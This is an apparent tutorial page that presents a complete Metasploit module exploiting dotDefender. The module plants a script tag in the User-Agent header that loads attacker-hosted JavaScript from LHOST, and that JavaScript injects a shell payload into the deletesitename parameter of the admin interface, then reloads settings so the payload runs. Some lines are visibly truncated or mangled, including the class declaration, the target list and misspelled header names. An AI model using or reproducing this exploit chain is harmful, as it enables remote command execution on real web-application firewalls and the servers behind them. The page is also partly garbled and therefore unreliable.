Final Exploit
a11y.text Final ExploitSo now we can see again the final exploit. This is all that is necessary to go from PoC to full Metasploit module in a few simple steps. We will be further expanding on this code in later sections going deeper into ways of making a better Metasploit module such as expanding targets, increasing reliability, etc.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "dotDefender %q{
This module exploits a vulnerability found in dotDefender.
},
'License' => MSF_LICENSE,
'Author' =>
[
'John Dos', #Initial remote execution discovery
'rAWjAW' #Everything else
],
'References' =>
[
['EDB', '14310'],
['URL', 'http://www.exploit-db.com/exploits/14310/']
],
'Arch' => ARCH_CMD,
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix','linux'],
'Targets' =>
[
['dotDefender false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('TRIGGERLOG', [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),
OptString.new('SITENAME', [true, 'This is usually the same as RHOST but is available as an option if different']),
OptString.new('LHOST', [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),
OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
], self.class)
end
def exploit
resp = send_request_raw({
'uri' => "http://#{rhost}/",
'version' => '1.1',
'method' => 'GET',
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">",
},
'data' => "#{datastore['TRIGGERLOG']}"
})
super
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
sitename = datastore['SITENAME']
content = %Q|
var http = new XMLHttpRequest();
var url = "../index.cgi";
var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
http.open("POST",url,true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.conreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
alert(http.responseText);
}
}
http.send(params);
var http2 = new XMLHttpRequest();
var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http2.open("POST",url,true);
http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http2.setRequestHeader("Content-lenth", params2.length);
http2.setRequestHeader("Connection","close");
http2.conreadystatechange = function() {
if(http2.readyState == 4 && http2.status == 200) {
alert(http2.responseText);
}
}
http2.send(params2);
var http3 = new XMLHttpRequest();
var params3 = "newsitename=#{sitename}&action=newsite";
http3.open("POST",url,true);
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-lenth", params3.length);
http3.setRequestHeader("Connection","close");
http3.conreadystatechange = function() {
if(http3.readyState == 4 && http3.status == 200) {
alert(http3.responseText);
}
}
http3.send(params3);
var http4 = new XMLHttpRequest();
var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http4.open("POST",url,true);
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-lenth", params4.length);
http4.setRequestHeader("Connection","close");
http4.conreadystatechange = function() {
if(http4.readyState == 4 && http4.status == 200) {
alert(http4.responseText);
}
}
http4.send(params4);
|
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
end